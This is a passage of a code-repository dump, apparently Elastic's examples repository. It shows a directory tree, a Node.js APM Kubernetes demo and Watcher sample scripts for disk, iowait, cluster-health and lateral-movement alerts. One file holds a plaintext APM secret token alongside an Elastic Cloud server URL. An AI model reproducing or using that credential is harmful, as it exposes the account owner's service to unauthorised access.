    │   │           │   ├── server.log.2016-12-19-20
    │   │           │   ├── server.log.2016-12-19-21
    │   │           │   ├── server.log.2016-12-19-22
    │   │           │   ├── server.log.2016-12-19-23
    │   │           │   ├── state-change.log
    │   │           │   ├── state-change.log.2016-12-19-16
    │   │           │   └── state-change.log.2016-12-19-18
    │   │       ├── kafka1
    │   │           └── logs
    │   │           │   ├── controller.log
    │   │           │   ├── controller.log.2016-12-19-16
    │   │           │   ├── controller.log.2016-12-19-18
    │   │           │   ├── kafka-authorizer.log
    │   │           │   ├── kafka-request.log
    │   │           │   ├── kafkaServer-gc.log
    │   │           │   ├── log-cleaner.log
    │   │           │   ├── log-cleaner.log.2016-12-19-16
    │   │           │   ├── log-cleaner.log.2016-12-19-18
    │   │           │   ├── server.log
    │   │           │   ├── server.log.2016-12-19-16
    │   │           │   ├── server.log.2016-12-19-17
    │   │           │   ├── server.log.2016-12-19-18
    │   │           │   ├── server.log.2016-12-19-19
    │   │           │   ├── server.log.2016-12-19-20
    │   │           │   ├── server.log.2016-12-19-21
    │   │           │   ├── server.log.2016-12-19-22
    │   │           │   ├── server.log.2016-12-19-23
    │   │           │   ├── state-change.log
    │   │           │   ├── state-change.log.2016-12-19-16
    │   │           │   ├── state-change.log.2016-12-19-18
    │   │           │   └── state-change.log.2016-12-19-19
    │   │       └── kafka2
    │   │           └── logs
    │   │               ├── controller.log
    │   │               ├── controller.log.2016-12-19-16
    │   │               ├── kafka-authorizer.log
    │   │               ├── kafka-request.log
    │   │               ├── kafkaServer-gc.log
    │   │               ├── log-cleaner.log
    │   │               ├── log-cleaner.log.2016-12-19-16
    │   │               ├── server.log
    │   │               ├── server.log.2016-12-19-16
    │   │               ├── server.log.2016-12-19-17
    │   │               ├── server.log.2016-12-19-18
    │   │               ├── server.log.2016-12-19-19
    │   │               ├── server.log.2016-12-19-20
    │   │               ├── server.log.2016-12-19-21
    │   │               ├── server.log.2016-12-19-22
    │   │               ├── server.log.2016-12-19-23
    │   │               ├── state-change.log
    │   │               ├── state-change.log.2016-12-19-16
    │   │               ├── state-change.log.2016-12-19-18
    │   │               └── state-change.log.2016-12-19-19
    ├── kafka_monitoring_with_beats_modules
    │   ├── README.md
    │   ├── Vagrantfile
    │   ├── provisioner.sh
    │   └── run-kafka.sh
    └── kibana_geoserver
    │   ├── Dockerfile
    │   └── README.md
├── MonitoringEKS
    ├── README.md
    ├── beats
    │   ├── filebeat-kubernetes.yaml
    │   └── metricbeat-kubernetes.yaml
    ├── config
    │   └── metricbeat-iam-policy.json
    ├── images
    │   ├── k8s-overview.png
    │   ├── k8s.png
    │   ├── logs-app.png
    │   └── metrics-app.png
    └── secrets
    │   ├── CREDS
    │       ├── AWS_ACCESS_KEY_ID
    │       ├── AWS_ACCESS_KEY_SECRET
    │       ├── ELASTIC_CLOUD_AUTH
    │       └── ELASTIC_CLOUD_ID
    │   ├── generate-secrets-manifest.sh
    │   └── secrets-example.yaml
├── MonitoringKubernetes
    ├── CLOUD_ID
    ├── DockerDashboard.png
    ├── ELASTIC_PASSWORD
    ├── README.md
    ├── download.txt
    ├── elasticsearch.yaml
    ├── filebeat-kubernetes.yaml
    ├── guestbook.yaml
    ├── metricbeat-kubernetes.yaml
    ├── packetbeat-kubernetes.yaml
    ├── scaling-discover.png
    └── watch.txt
├── README.md
├── Reference
    └── Beats
    │   ├── README.md
    │   ├── filebeat.example.yml
    │   ├── heartbeat.example.yml
    │   └── metricbeat.example.yml
├── Search
    ├── recipe_search_java
    │   ├── README.md
    │   ├── data
    │   │   ├── banana-oatmeal-cookie.json
    │   │   ├── basil-and-pesto-hummus.json
    │   │   ├── black-bean-and-rice-enchiladas.json
    │   │   ├── divine-hard-boiled-eggs.json
    │   │   ├── four-cheese-margherita-pizza.json
    │   │   ├── homemade-black-bean-veggie-burgers.json
    │   │   ├── homemade-chicken-enchiladas.json
    │   │   ├── marinated-grilled-shrimp.json
    │   │   ├── vegetable-fried-rice.json
    │   │   ├── vegetarian-korma.json
    │   │   └── worlds-best-lasagna.json
    │   ├── pom.xml
    │   ├── recipes.iml
    │   ├── src
    │   │   └── main
    │   │   │   ├── java
    │   │   │       └── com
    │   │   │       │   └── elastic
    │   │   │       │       └── recipe
    │   │   │       │           ├── IndexRecipesApp.java
    │   │   │       │           ├── SearchRecipesApp.java
    │   │   │       │           └── SearchRecipesServlet.java
    │   │   │   └── webapp
    │   │   │       ├── WEB-INF
    │   │   │           └── web.xml
    │   │   │       ├── css
    │   │   │           ├── bootstrap-table.css
    │   │   │           ├── bootstrap-table.min.css
    │   │   │           ├── bootstrap-theme.css
    │   │   │           ├── bootstrap-theme.css.map
    │   │   │           ├── bootstrap-theme.min.css
    │   │   │           ├── bootstrap-theme.min.css.map
    │   │   │           ├── bootstrap.css
    │   │   │           ├── bootstrap.css.map
    │   │   │           ├── bootstrap.min.css
    │   │   │           ├── bootstrap.min.css.map
    │   │   │           ├── index.css
    │   │   │           └── recipes.css
    │   │   │       ├── fonts
    │   │   │           ├── glyphicons-halflings-regular.eot
    │   │   │           ├── glyphicons-halflings-regular.svg
    │   │   │           ├── glyphicons-halflings-regular.ttf
    │   │   │           ├── glyphicons-halflings-regular.woff
    │   │   │           └── glyphicons-halflings-regular.woff2
    │   │   │       ├── js
    │   │   │           ├── boostrap-table-editable.js
    │   │   │           ├── bootstrap-editable.js
    │   │   │           ├── bootstrap-table-editable.js
    │   │   │           ├── bootstrap-table-export.js
    │   │   │           ├── bootstrap-table-zh-CN.min.js
    │   │   │           ├── bootstrap-table.js
    │   │   │           ├── bootstrap-table.min.js
    │   │   │           ├── bootstrap.js
    │   │   │           ├── bootstrap.min.js
    │   │   │           ├── npm.js
    │   │   │           └── tableExport.js
    │   │   │       └── recipes.html
    │   └── target
    │   │   └── classes
    │   │       └── com
    │   │           └── elastic
    │   │               └── recipe
    │   │                   ├── IndexRecipesApp.class
    │   │                   ├── SearchRecipesApp.class
    │   │                   └── SearchRecipesServlet.class
    └── recipe_search_php
    │   ├── .gitignore
    │   ├── README.md
    │   ├── composer.json
    │   ├── data
    │       ├── recipes
    │       │   ├── banana-oatmeal-cookie.json
    │       │   ├── basil-and-pesto-hummus.json
    │       │   ├── black-bean-and-rice-enchiladas.json
    │       │   ├── divine-hard-boiled-eggs.json
    │       │   ├── four-cheese-margherita-pizza.json
    │       │   ├── homemade-black-bean-veggie-burgers.json
    │       │   ├── homemade-chicken-enchiladas.json
    │       │   ├── marinated-grilled-shrimp.json
    │       │   ├── vegetable-fried-rice.json
    │       │   ├── vegetarian-korma.json
    │       │   └── worlds-best-lasagna.json
    │       └── seed.php
    │   ├── public
    │       ├── add.php
    │       ├── advanced.php
    │       ├── css
    │       │   └── bootstrap.min.css
    │       ├── index.php
    │       ├── js
    │       │   ├── jquery.min.js
    │       │   └── script.js
    │       ├── results.php
    │       ├── simple.php
    │       └── view.php
    │   └── src
    │       └── RecipeSearch
    │           ├── Constants.php
    │           └── Util.php
├── Security Analytics
    ├── ACSC2020-008_IOCs
    │   ├── README.md
    │   ├── acsc-2020-008-IOCs.ndjson
    │   └── images
    │   │   └── siem-rules.png
    ├── SIEM-at-Home
    │   ├── README.md
    │   └── beats-configs
    │   │   ├── beats-general-config.yml
    │   │   ├── beats-on-centos
    │   │       ├── auditbeat.yml
    │   │       ├── filebeat.yml
    │   │       └── packetbeat.yml
    │   │   ├── beats-on-macOS
    │   │       ├── auditbeat.yml
    │   │       └── packetbeat.yml
    │   │   ├── beats-on-windows
    │   │       ├── auditbeat.yml
    │   │       ├── packetbeat.yml
    │   │       └── winlogbeat.yml
    │   │   ├── filebeat
    │   │       └── filebeat-syslog-input.yml
    │   │   └── packetbeat
    │   │       └── packetbeat.yml
    ├── SIEM-examples
    │   ├── Detections-API
    │   │   └── Kibana.postman_collection.v2.json
    │   ├── Packetbeat
    │   │   └── geoip-info.json
    │   └── README.md
    ├── auditd_analysis
    │   ├── README.md
    │   ├── auditd_analysis_logstash.conf
    │   ├── example_1
    │   │   ├── README.md
    │   │   ├── auditd.cef
    │   │   ├── auditd_analysis_kibana.json
    │   │   ├── new_process.inline.json
    │   │   └── new_process.json
    │   ├── example_2
    │   │   ├── README.md
    │   │   ├── auditd.cef.tar.gz
    │   │   ├── data_feed.json
    │   │   ├── job.json
    │   │   ├── reset_job.sh
    │   │   ├── unusual_process.inline.json
    │   │   └── unusual_process.json
    │   ├── requirements.txt
    │   └── simulate_watch.py
    ├── cef_with_kafka
    │   ├── README.md
    │   ├── docker-compose.yml
    │   ├── kafka
    │   │   ├── Dockerfile
    │   │   ├── broker-list.sh
    │   │   ├── create-topics.sh
    │   │   ├── download-kafka.sh
    │   │   ├── start-kafka-shell.sh
    │   │   └── start-kafka.sh
    │   └── logstash
    │   │   ├── Dockerfile
    │   │   └── config
    │   │       └── logstash.yml
    ├── cef_with_logstash
    │   ├── docker-compose.yml
    │   └── logstash
    │   │   ├── Dockerfile
    │   │   └── config
    │   │       └── logstash.yml
    ├── dns_tunnel_detection
    │   ├── .gitignore
    │   ├── README.md
    │   ├── dns-tunnel-iodine.pcap
    │   ├── dns_transform.painless
    │   ├── packetbeat-dns.template.json
    │   ├── packetbeat.yml
    │   └── unique_hostnames_watch.json
    ├── malware_analysis
    │   ├── README.md
    │   ├── images
    │   │   └── kibana.png
    │   ├── packetbeat.yml
    │   ├── sysmonconfig.xml
    │   └── winlogbeat.yml
    └── ssh_analysis
    │   ├── README.md
    │   ├── brute_force_login.inline.json
    │   ├── brute_force_login.json
    │   ├── run_watch.sh
    │   ├── ssh_analysis_kibana.json
    │   ├── ssh_analysis_logstash.conf
    │   ├── successful_login_external.inline.json
    │   └── successful_login_external.json
├── Speed Layer
    ├── README.md
    ├── dev_console.json
    ├── kibana_objects.ndjson
    └── logstash_batch_export.conf
├── beats-k8s-send-anywhere
    ├── DockerDashboard.png
    ├── ELASTICSEARCH_HOSTS
    ├── ELASTICSEARCH_PASSWORD
    ├── ELASTICSEARCH_USERNAME
    ├── ELASTIC_CLOUD_AUTH
    ├── ELASTIC_CLOUD_ID
    ├── KIBANA_HOST
    ├── README-Cloud.md
    ├── README-Main.md
    ├── README-Self-Managed.md
    ├── README.md
    ├── filebeat-kubernetes.yaml
    ├── guestbook.yaml
    ├── metricbeat-kubernetes.yaml
    ├── packetbeat-kubernetes.yaml
    ├── scaling-discover.png
    └── scaling-up.png
├── blog
    ├── README.MD
    ├── climbing-the-pyramid-with-celestial-themed-malware
    │   ├── README.MD
    │   └── windows_trojan_deimos.yar
    ├── mozin-about
    │   ├── README.MD
    │   ├── collection.sh
    │   ├── index-settings.json
    │   ├── ingest-node-pipeline.json
    │   └── mozi-obfuscation-technique.yara
    └── reverse-geocoding
    │   └── csba.json
├── canvas
    ├── ama
    │   ├── README.md
    │   ├── ama-responses.bulk
    │   ├── canvas-workpad-ama-responses-alt.json
    │   ├── canvas-workpad-ama-responses.json
    │   └── images
    │   │   ├── existing-workpads.png
    │   │   └── no-workpads.png
    └── elasticoffee
    │   ├── README.md
    │   ├── canvas-workpad-CafeCanvas.json
    │   ├── elasticoffee-data.bulk
    │   ├── elasticon-home-assistant
    │       ├── automations
    │       │   └── elasticon-automations.yaml
    │       ├── coffeePressHandler.sh
    │       ├── configuration.yaml
    │       ├── customize.yaml
    │       ├── groups.yaml
    │       ├── load-test.sh
    │       ├── options.xml
    │       ├── scripts.yaml
    │       ├── shell_commands
    │       │   └── elasticon-shell_commands.yaml
    │       ├── zwcfg_0xf7001e9d.xml
    │       └── zwscene.xml
    │   └── images
    │       ├── existing-workpads.png
    │       └── no-workpads.png
├── k8s-observability-with-eck
    ├── ECK-obs-infrastructure.png
    ├── ELASTICSEARCH_HOSTS
    ├── ELASTICSEARCH_PASSWORD
    ├── ELASTICSEARCH_USERNAME
    ├── KIBANA_HOST
    ├── README.md
    ├── cert.yaml
    ├── filebeat-kubernetes.yaml
    ├── guestbook.yaml
    ├── heartbeat-kubernetes.yaml
    └── metricbeat-kubernetes.yaml
└── scraping-prometheus-k8s-with-metricbeat
    ├── CLOUD_ID
    ├── ELASTIC_PASSWORD
    ├── README.md
    ├── download.txt
    ├── guestbook.yaml
    ├── images
        ├── 001-kibana.png
        ├── 002-kibana.png
        ├── 003-kibana.png
        ├── 004-kibana.png
        ├── 005-kibana.png
        ├── 006-kibana.png
        ├── 007-kibana.png
        ├── 008-kibana.png
        ├── 009-kibana.png
        ├── 010-kibana.png
        ├── 011-kibana.png
        ├── 012-kibana.png
        ├── 013-kibana.png
        ├── 014-kibana.png
        ├── 015-kibana.png
        ├── 016-kibana.png
        ├── 017-kibana.png
        ├── 018-kibana.png
        ├── 019-kibana.png
        ├── 020-kibana.png
        ├── annotations.png
        ├── kube-state-metrics.png
        ├── metricbeat-autodiscover-exporters.png
        ├── metricbeat-prometheus-server.png
        ├── prometheus-autodiscover-snippet.png
        ├── prometheus-federate.png
        ├── prometheus-selfmon.png
        └── sidecar.png
    ├── metricbeat-clusterrolebinding.yaml
    ├── metricbeat-kube-state-and-prometheus-server.yaml
    └── metricbeat-prometheus-auto-discover.yaml


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Force all checkouts to convert to LF line endings
2 | # Treat these file types as binary
3 | *.pcap     binary
4 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/.dockerignore:
--------------------------------------------------------------------------------
1 | node-express.yaml
2 | node_modules
3 | npm-debug.log
4 | .gitignore
5 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules
2 | npm-debug.log
3 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:13.7
 2 | 
 3 | # Create app directory
 4 | WORKDIR /usr/src/app
 5 | 
 6 | # Install app dependencies
 7 | # A wildcard is used to ensure both package.json AND package-lock.json are copied
 8 | # where available (npm@5+)
 9 | COPY package*.json ./
10 | 
11 | RUN npm install
12 | # If you are building your code for production
13 | # RUN npm ci --only=production
14 | 
15 | # Bundle app source
16 | COPY . .
17 | 
18 | EXPOSE 8080
19 | CMD [ "node", "server.js" ]
20 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/ELASTIC_APM_SECRET_TOKEN:
--------------------------------------------------------------------------------
1 | jbFLkVXglRlFWzrxaf


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/ELASTIC_APM_SERVER_URL:
--------------------------------------------------------------------------------
1 | https://c2198b9a492d42a1b4faab380227701f.apm.us-east4.gcp.elastic-cloud.com:443


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/ELASTIC_APM_SERVICE_NAME:
--------------------------------------------------------------------------------
1 | node-example


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-1.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-2.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-3.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-4.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/APM-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/APM-5.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/Node-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/Node-1.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/images/Node-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/APM/Node.js/Kubernetes/images/Node-2.png


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/namespace.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | apiVersion: v1
3 | kind: Namespace
4 | metadata:
5 |   name: express-demo
6 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "docker_web_app",
 3 |   "version": "1.0.0",
 4 |   "description": "Node.js on Docker",
 5 |   "author": "Dan Roscigno <dan.roscigno@elastic.co>",
 6 |   "main": "server.js",
 7 |   "scripts": {
 8 |     "start": "node server.js"
 9 |   },
10 |   "dependencies": {
11 |     "elastic-apm-node": "^3.3.0",
12 |     "express": "^4.16.1"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/APM/Node.js/Kubernetes/server.js:
--------------------------------------------------------------------------------
 1 | 'use strict';
 2 | 
 3 | const apm = require('elastic-apm-node').start() // must run before any other require
 4 | 
 5 | const express = require('express');
 6 | 
 7 | // Constants
 8 | const PORT = 8080;
 9 | const HOST = '0.0.0.0';
10 | 
11 | // App
12 | const app = express();
13 | app.get('/', (req, res) => {
14 |   res.send('Hello World');
15 | });
16 | 
17 | app.listen(PORT, HOST);
18 | console.log(`Running on http://${HOST}:${PORT}`);
19 | 
20 | 
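
With no options, start() reads its configuration from the ELASTIC_APM_* environment variables (the values kept in the ELASTIC_APM_SERVICE_NAME, ELASTIC_APM_SERVER_URL, and ELASTIC_APM_SECRET_TOKEN files above). A minimal sketch of the equivalent explicit configuration, assuming those variables are exposed in the pod spec:

    // Sketch: explicit agent configuration; start() with no options
    // falls back to these same environment variables.
    const apm = require('elastic-apm-node').start({
      serviceName: process.env.ELASTIC_APM_SERVICE_NAME,
      serverUrl: process.env.ELASTIC_APM_SERVER_URL,
      secretToken: process.env.ELASTIC_APM_SECRET_TOKEN,
    })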


--------------------------------------------------------------------------------
/Alerting/Sample Watches/.gitignore:
--------------------------------------------------------------------------------
 1 | todo
 2 | dist*
 3 | *.venv
 4 | *.idea
 5 | *.gz
 6 | *.log
 7 | *.local
 8 | /dist/
 9 | /build/
10 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/cpu_iowait_hosts/scripts/calculate_iowait.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "(doc['system.cpu.iowait.pct'].value\/(doc['system.cpu.user.pct'].value + doc['system.cpu.nice.pct'].value + doc['system.cpu.system.pct'].value + doc['system.cpu.idle.pct'].value + doc['system.cpu.iowait.pct'].value + doc['system.cpu.irq.pct'].value + doc['system.cpu.softirq.pct'].value + doc['system.cpu.steal.pct'].value))*100"
5 |   }
6 | }
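
The one-liner expresses iowait as a share of total CPU time across all states:

    iowait% = 100 * iowait.pct / (user.pct + nice.pct + system.pct + idle.pct
                                  + iowait.pct + irq.pct + softirq.pct + steal.pct)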


--------------------------------------------------------------------------------
/Alerting/Sample Watches/cpu_iowait_hosts/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def threshold=ctx.metadata.threshold; def hosts = ctx.payload.aggregations.per_host.buckets; if (hosts.size() == 0) return false; return hosts.stream().anyMatch(p -> p.per_minute.buckets[p.per_minute.buckets.length - 1].iowait_deriv.value > threshold);"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/cpu_iowait_hosts/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def threshold=ctx.metadata.threshold; def hosts = ctx.payload.aggregations.per_host.buckets; return hosts.stream().filter(p -> p.per_minute.buckets[p.per_minute.buckets.length - 1].iowait_deriv.value > threshold).map(e -> ['key': e.key, 'value': e.per_minute.buckets[e.per_minute.buckets.length - 1].iowait_deriv.value]).collect(Collectors.toList());"
5 |   }
6 | }
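
Both the condition and transform above walk the same aggregation shape: per-host buckets, each holding a per-minute date histogram whose last bucket carries the iowait derivative. A minimal sketch of the payload they expect (names taken from the scripts; values illustrative):

    {
      "aggregations": {
        "per_host": {
          "buckets": [
            {
              "key": "host-1",
              "per_minute": {
                "buckets": [ { "iowait_deriv": { "value": 12.5 } } ]
              }
            }
          ]
        }
      }
    }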


--------------------------------------------------------------------------------
/Alerting/Sample Watches/errors_in_logs/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "@timestamp": {
 5 |           "type": "date",
 6 |           "format": "strict_date_optional_time||epoch_millis"
 7 |         },
 8 |         "message": {
 9 |           "type": "text"
10 |         },
11 |         "loglevel":{
12 |           "type": "keyword"
13 |         }
14 |       }
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/filesystem_usage/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "hostname":{
 5 |           "type": "keyword"
 6 |         },
 7 |         "used_p":{
 8 |           "type": "double"
 9 |         },
10 |         "@timestamp":{
11 |           "type":"date"
12 |         }
13 |       }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/filesystem_usage/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def threshold_p = ctx.metadata.threshold*100; return [ 'threshold': (int)threshold_p, 'hosts': ctx.payload.aggregations.host.buckets.stream().map(p -> [ 'key': p.key, 'disk_usage': (int) (p.disk_usage.value*100)]).collect(Collectors.toList()) ];"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/filesystem_usage/tests/test1.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "watch_name":"filesystem_usage",
 3 |   "mapping_file":"./filesystem_usage/mapping.json",
 4 |   "index":"logs",
 5 |   "type":"filesystem",
 6 |   "watch_file":"./filesystem_usage/watch.json",
 7 |   "comments":"Tests filesystem being above 0.9. Server 1 & 4 should alert as within 60 seconds. Server 2 should not (10 mins). 3rd server should not alert as < 0.9.",
 8 |   "scripts":[{"name":"transform","path":"./filesystem_usage/scripts/transform.json"}],
 9 |   "events":[
10 |   {
11 |     "hostname": "test_server1",
12 |     "used_p": 0.99,
13 |     "offset":"-60"
14 |   },
15 |   {
16 |     "hostname": "test_server2",
17 |     "used_p": 0.98,
18 |     "offset":"-600"
19 |   },
20 |   {
21 |     "hostname": "test_server3",
22 |     "used_p": 0.89,
23 |     "offset":"-60"
24 |   },
25 |   {
26 |     "hostname": "test_server4",
27 |     "used_p": 0.95
28 |   }
29 |   ],
30 |   "expected_response":"Some hosts are over 90% utilized:99%-test_server1:95%-test_server4:"
31 | }
32 | 
33 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/large_shard_watch/README.md:
--------------------------------------------------------------------------------
 1 | # Monitoring for Large Shards
 2 | 
 3 | ## Description
 4 | 
 5 | This watch creates a helper index (`large_shards`) and uses it to alert once per shard whose size exceeds the threshold defined in the metadata.
 6 | 
 7 | It first queries the `_cat/shards` API to collect the shard information, and then ingests the results into the helper index.
 8 | 
 9 | 
10 | ## Configuration
11 | 
12 | * Metadata is where the `threshold_in_bytes` is set; see the sketch below.
13 | 
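14 | For example, a minimal metadata block inside the watch definition (the 5 GB value here is purely illustrative, not a shipped default):
15 | 
16 | ```
17 | "metadata": {
18 |   "threshold_in_bytes": 5368709120
19 | }
20 | ```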


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/ingest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "extracts the time field required by the lateral_movement_in_user_comm watch",
 3 |   "processors": [
 4 |     {
 5 |       "grok": {
 6 |         "field": "@timestamp",
 7 |         "patterns": [
 8 |           "%{YEAR}-%{MONTHNUM}-%{MONTHDAY}T%{TIME:time}"
 9 |         ],
10 |         "pattern_definitions": {
11 |           "TIME": "%{ISO8601_HOUR}:%{MINUTE}:([0-5]?[0-9]|60)"
12 |         }
13 |       }
14 |     }
15 |   ]
16 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "user_server": {
 5 |           "type": "keyword"
 6 |         },
 7 |         "@timestamp": {
 8 |           "type": "date",
 9 |           "format": "strict_date_optional_time"
10 |         },
11 |         "time": {
12 |           "type": "date",
13 |           "format": "HH:mm:ss||strict_time_no_millis"
14 |         }
15 |       }
16 |   }
17 | }
18 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.user_server_logons.aggregations.user_server.buckets.size() != ctx.payload.new_user_server_logons.aggregations.user_server.buckets.size();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/lower_time.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return LocalDateTime.parse(params.current_time.substring(0,19)).minusMinutes(30).format(DateTimeFormatter.ofPattern('HH:mm:ss'))+'Z';"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def history = ctx.payload.new_user_server_logons.aggregations.user_server.buckets.stream().map(p -> p.key).collect(Collectors.toList()); def response=[:]; response['lower_time']=ctx.payload.get_time_period.hits.hits[0].fields.lower_time[0]; response['upper_time']=ctx.payload.get_time_period.hits.hits[0].fields.upper_time[0]; response['new_starts']=ctx.payload.user_server_logons.aggregations.user_server.buckets.stream().map(p -> p.key).filter(p -> !history.contains(p)).map(p -> p.replace('_',' on server ')).collect(Collectors.toList());  return response;"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/lateral_movement_in_user_comm/scripts/upper_time.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return LocalDateTime.parse(params.current_time.substring(0,19)).plusMinutes(30).format(DateTimeFormatter.ofPattern('HH:mm:ss'))+'Z';"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_cluster_health/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "date_detection": false,
 4 |       "properties": {
 5 |         "cluster_state": {
 6 |           "properties": {
 7 |             "master_node": {
 8 |               "type": "keyword"
 9 |             },
10 |             "nodes": {
11 |               "type": "object",
12 |               "enabled": false
13 |             },
14 |             "shards": {
15 |               "type": "object"
16 |             },
17 |             "state_uuid": {
18 |               "type": "keyword"
19 |             },
20 |             "status": {
21 |               "type": "keyword"
22 |             },
23 |             "version": {
24 |               "type": "long"
25 |             }
26 |           }
27 |         },
28 |         "cluster_uuid": {
29 |           "type": "keyword"
30 |         },
31 |         "timestamp": {
32 |           "type": "date",
33 |           "format": "date_time"
34 |         },
35 |         "type": {
36 |           "type": "keyword"
37 |         }
38 |       }
39 |   }
40 | }
41 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_cluster_health/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def is_not_green=ctx.payload.aggregations.clusters.buckets.stream().anyMatch(t -> (t.latest_state.hits.hits[0]._source.cluster_state.status== 'yellow' || t.latest_state.hits.hits[0]._source.cluster_state.status == 'red')); if (is_not_green) { def required_periods = (ctx.metadata.not_green_secs-ctx.metadata.monitoring_update_interval)/ctx.metadata.monitoring_update_interval; return ctx.payload.aggregations.clusters.buckets.stream().anyMatch(t -> ((t.cluster_state.buckets.red.doc_count + t.cluster_state.buckets.yellow.doc_count) >= required_periods ));}  return false;"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_cluster_health/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def required_periods = (ctx.metadata.not_green_secs-ctx.metadata.monitoring_update_interval)/ctx.metadata.monitoring_update_interval; return ctx.payload.aggregations.clusters.buckets.stream().filter(t -> (t.latest_state.hits.hits[0]._source.cluster_state.status == 'yellow' || t.latest_state.hits.hits[0]._source.cluster_state.status == 'red')).filter(t -> (t.cluster_state.buckets.red.doc_count + t.cluster_state.buckets.yellow.doc_count) >= required_periods).map(t -> ['cluster_id':t.key,'cluster_state':t.latest_state.hits.hits[0]._source.cluster_state.status]).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_free_disk_space/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.aggregations.nodes.buckets.stream().anyMatch(it -> it.free_ratio.value < ctx.metadata.lower_bound);"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/monitoring_free_disk_space/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
